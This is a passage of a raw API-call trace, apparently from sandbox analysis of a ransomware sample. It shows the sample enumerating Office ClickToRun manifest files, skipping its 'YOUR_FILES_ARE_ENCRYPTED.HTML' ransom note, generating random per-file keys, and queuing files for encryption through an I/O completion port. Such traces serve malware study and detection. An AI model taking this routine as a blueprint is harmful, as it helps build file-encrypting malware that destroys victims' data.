[0156.217] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x75122b8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.217] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75122b8, lpOverlapped=0x75122b8) returned 1 [0156.217] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77da7930, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2698, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml", cAlternateFileName="C21C45~1.XML")) returned 1 [0156.217] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned 116 [0156.217] lstrcmpW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.217] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml") returned=".xml" [0156.217] lstrlenW (lpString=".xml") returned 4 [0156.217] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml") returned=".xml" [0156.217] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0156.218] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9880) returned 1 [0156.218] GetProcessHeap () returned 0x270000 [0156.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x753a410 [0156.221] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4F") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="8F") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E5") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="45") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="EC") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B9") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4E") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3A") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3F") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="CB") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="02") returned 2 [0156.221] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="BC") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C4") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="40") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DA") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="E7") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3A") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B0") returned 2 
[0156.222] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FF") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="16") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="CA") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C3") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="B7") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="AF") returned 2 [0156.222] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="D3") returned 2 [0156.222] lstrcpyW (in: lpString1=0x754a4c4, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" [0156.222] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x753a410, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.223] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x753a410, lpOverlapped=0x753a410) returned 1 [0156.223] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7752cad0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x16c9a, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", cAlternateFileName="C29151~1.XML")) 
returned 1 [0156.223] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned 131 [0156.223] lstrcmpW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.223] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned=".xml" [0156.223] lstrlenW (lpString=".xml") returned 4 [0156.223] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") returned=".xml" [0156.223] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.223] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0156.224] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=93338) returned 1 [0156.224] GetProcessHeap () returned 0x270000 [0156.224] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7562568 [0156.228] lstrcpyW (in: lpString1=0x757261c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" [0156.228] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7562568, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.228] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7562568, lpOverlapped=0x7562568) returned 1 [0156.228] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77ce9250, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x178c4, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml", cAlternateFileName="C2C4E2~1.XML")) returned 1 [0156.228] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned 118 [0156.228] lstrcmpW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.228] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml") returned=".xml" [0156.228] lstrlenW (lpString=".xml") returned 4 [0156.228] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml") returned=".xml" [0156.228] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.229] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: 
"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0156.229] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=96452) returned 1 [0156.229] GetProcessHeap () returned 0x270000 [0156.229] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x758a6c0 [0156.233] lstrcpyW (in: lpString1=0x759a774, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" [0156.233] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x758a6c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.233] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x758a6c0, lpOverlapped=0x758a6c0) returned 1 [0156.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77552c30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xadce8, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cAlternateFileName="C280EB~1.XML")) returned 1 [0156.233] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned 137 [0156.233] lstrcmpW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.233] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned=".xml" [0156.233] lstrlenW (lpString=".xml") returned 4 [0156.233] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned=".xml" [0156.233] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.233] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0156.234] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=711912) returned 1 [0156.234] GetProcessHeap () returned 0x270000 [0156.234] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.238] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" [0156.238] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.238] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d3ee10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d3ee10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77494550, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x19170, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cAlternateFileName="C222CA~1.XML")) returned 1 [0156.238] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned 137 [0156.238] lstrcmpW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.238] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned=".xml" [0156.238] lstrlenW (lpString=".xml") returned 4 [0156.238] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned=".xml" [0156.238] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.239] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.424] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=102768) returned 1 [0156.424] GetProcessHeap () returned 0x270000 [0156.425] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.428] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" [0156.428] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.428] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.429] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77d5b670, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x684e, 
dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml", cAlternateFileName="C27FF4~1.XML")) returned 1 [0156.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") returned 121 [0156.429] lstrcmpW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.429] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml") returned=".xml" [0156.429] lstrlenW (lpString=".xml") returned 4 [0156.429] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml") returned=".xml" [0156.431] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.431] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0156.431] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=26702) returned 1 [0156.431] GetProcessHeap () returned 0x270000 [0156.431] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.446] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" [0156.446] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.446] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77fbcc70, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x636e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml", cAlternateFileName="C2B3EB~1.XML")) returned 1 [0156.449] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned 121 [0156.449] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.451] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml") returned=".xml" [0156.451] lstrlenW (lpString=".xml") returned 4 [0156.451] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml") returned=".xml" [0156.451] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.451] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: 
"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.454] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=25454) returned 1 [0156.454] GetProcessHeap () returned 0x270000 [0156.454] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.455] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B9") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="8D") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E1") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="4D") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AD") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A0") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="FB") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="24") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="77") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D7") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C5") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="5C") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3F") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: 
param_1="18") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4C") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="DB") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A8") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="3B") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="55") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="40") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A5") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="71") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="FE") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="29") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C1") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7F") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D6") returned 2 [0156.456] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="13") returned 2 [0156.456] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="2C") returned 2 [0156.456] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="00") returned 2 [0156.456] lstrcpyW (in: lpString1=0x74d20bc, 